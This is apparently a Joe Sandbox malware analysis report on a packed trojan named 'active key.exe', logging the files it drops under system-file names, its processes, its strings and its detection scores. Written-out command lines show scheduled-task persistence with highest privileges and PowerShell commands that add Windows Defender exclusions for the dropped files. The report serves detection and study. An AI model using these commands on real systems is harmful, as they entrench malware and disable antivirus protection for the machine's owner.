                    Source: powershell.exe, 0000001C.00000002.2419074977.0000015C39671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226581C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200615D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: active key.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                    Source: powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: active key.exe, 00000000.00000002.2261569958.000002CBC844C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/
                    Source: active key.exe, 00000000.00000003.2258183311.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp, active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/ace
                    Source: active key.exe, 00000000.00000003.2258183311.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp, active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://keyauth.win/api/1.1/pacec
                    Source: powershell.exe, 0000001C.00000002.3479314878.0000015C496E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.3519140010.00000160BBB44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownHTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.6:49727 version: TLS 1.2

                    System Summary

                    barindex
                    Detected VMProtect packer
                    Source: active key.exeStatic PE information: .vmp0 and .vmp1 section names
                    Source: C:\Users\user\Desktop\active key.exeFile created: C:\Windows\System32\ntoskrnl2.exeJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Windows\System32\33a22f3fbfeb15Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Windows\en-GB\c5cac97cf6c584Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Windows\tracing\fontdrvhost.exeJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Windows\tracing\5b884080fd4f94Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD346C9DDD5_2_00007FFD346C9DDD
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 5_2_00007FFD346C7B635_2_00007FFD346C7B63
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD3431245D28_2_00007FFD3431245D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD3431B95828_2_00007FFD3431B958
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD343184E328_2_00007FFD343184E3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD343164FB28_2_00007FFD343164FB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD3431563A28_2_00007FFD3431563A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD3431A1FB28_2_00007FFD3431A1FB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD34313EB828_2_00007FFD34313EB8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD343116D128_2_00007FFD343116D1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD3431BAFB28_2_00007FFD3431BAFB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD34316FFA28_2_00007FFD34316FFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD34315BFA28_2_00007FFD34315BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD343E0D8F28_2_00007FFD343E0D8F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD3431604D28_2_00007FFD3431604D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD342F5CFA29_2_00007FFD342F5CFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD342FBA4829_2_00007FFD342FBA48
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD342F270329_2_00007FFD342F2703
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD342FBAFA29_2_00007FFD342FBAFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD342FAF4D29_2_00007FFD342FAF4D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD342F6FD329_2_00007FFD342F6FD3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD342F604D29_2_00007FFD342F604D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD343C734229_2_00007FFD343C7342
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342FA2FA32_2_00007FFD342FA2FA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342F5CFA32_2_00007FFD342F5CFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342F84F232_2_00007FFD342F84F2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342F25BD32_2_00007FFD342F25BD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342F65FB32_2_00007FFD342F65FB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342F6F8232_2_00007FFD342F6F82
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342F5BFA32_2_00007FFD342F5BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD342F604D32_2_00007FFD342F604D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD343C734232_2_00007FFD343C7342
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFD343C2E1132_2_00007FFD343C2E11
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD34305CFA34_2_00007FFD34305CFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD343084F234_2_00007FFD343084F2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD3430ACF234_2_00007FFD3430ACF2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD343025BD34_2_00007FFD343025BD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD343065FB34_2_00007FFD343065FB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD343016D134_2_00007FFD343016D1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD343016FA34_2_00007FFD343016FA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD34306F8234_2_00007FFD34306F82
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD34305BFA34_2_00007FFD34305BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFD3430604D34_2_00007FFD3430604D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD342F245D36_2_00007FFD342F245D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD342FA10236_2_00007FFD342FA102
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD342FACF236_2_00007FFD342FACF2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD342F84E336_2_00007FFD342F84E3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD342F5BFA36_2_00007FFD342F5BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD342F6FFA36_2_00007FFD342F6FFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343C734236_2_00007FFD343C7342
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343C30E936_2_00007FFD343C30E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342F245D37_2_00007FFD342F245D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342F64FB37_2_00007FFD342F64FB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342FBAF237_2_00007FFD342FBAF2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342F84E337_2_00007FFD342F84E3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342F5BFA37_2_00007FFD342F5BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342F6FFA37_2_00007FFD342F6FFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD343C660537_2_00007FFD343C6605
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD343C734237_2_00007FFD343C7342
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD343C0D5937_2_00007FFD343C0D59
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD343C30E737_2_00007FFD343C30E7
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_00007FFD342F604D37_2_00007FFD342F604D
                    Source: C:\Windows\System32\ntoskrnl2.exeCode function: 48_2_00007FFD3430095648_2_00007FFD34300956
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeCode function: 49_2_00007FFD34320BAC49_2_00007FFD34320BAC
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeCode function: 49_2_00007FFD34320D8F49_2_00007FFD34320D8F
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\DnHERPdP.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                    Source: aAtQiRdB.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: mlzPodne.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: UZXJUHSP.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: DnHERPdP.log.46.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: ZHsakaRB.log.46.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: hCHhiobl.log.46.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: ntoskrnl2.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: XUkPLaESKIkbWXdxlvmVntDv.exe.5.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: XUkPLaESKIkbWXdxlvmVntDv.exe0.5.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: fontdrvhost.exe.5.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: explorer.exe.5.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: backgroundTaskHost.exe.5.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: aAtQiRdB.log.5.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: mlzPodne.log.5.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: UZXJUHSP.log.5.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: DnHERPdP.log.46.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: ZHsakaRB.log.46.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: hCHhiobl.log.46.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@59/50@2/3
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\Desktop\aAtQiRdB.logJump to behavior
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1596:120:WilError_03
                    Source: C:\Windows\System32\ntoskrnl2.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DkfDkSKDFkSDFKFDSgdfgk
                    Source: C:\Windows\System32\ntoskrnl2.exeFile created: C:\Users\user\AppData\Local\Temp\po0Y962PsXJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat"
                    Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                    Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Windows\System32\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\active key.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: active key.exeReversingLabs: Detection: 68%
                    Source: active key.exeVirustotal: Detection: 67%
                    Source: active key.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectory
                    Source: unknownProcess created: C:\Users\user\Desktop\active key.exe "C:\Users\user\Desktop\active key.exe"
                    Source: C:\Users\user\Desktop\active key.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\active key.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c mode con cols=55 lines=15
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con cols=55 lines=15
                    Source: C:\Users\user\Desktop\active key.exeProcess created: C:\Windows\System32\ntoskrnl2.exe "C:\Windows\System32\ntoskrnl2.exe"
                    Source: C:\Users\user\Desktop\active key.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "md5"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "certutil"
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 8 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDv" /sc ONLOGON /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 9 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 9 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ntoskrnl2" /sc ONLOGON /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 5 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\backgroundTaskHost.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                    Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\ntoskrnl2.exe C:\Windows\System32\ntoskrnl2.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: unknownProcess created: C:\Windows\System32\ntoskrnl2.exe C:\Windows\System32\ntoskrnl2.exe
                    Source: unknownProcess created: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                    Source: unknownProcess created: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\active key.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c mode con cols=55 lines=15Jump to behavior
                    Source: C:\Users\user\Desktop\active key.exeProcess created: C:\Windows\System32\ntoskrnl2.exe "C:\Windows\System32\ntoskrnl2.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\active key.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 | find /i /v "md5" | find /i /v "certutil"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con cols=55 lines=15Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /fJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 Jump to behavior
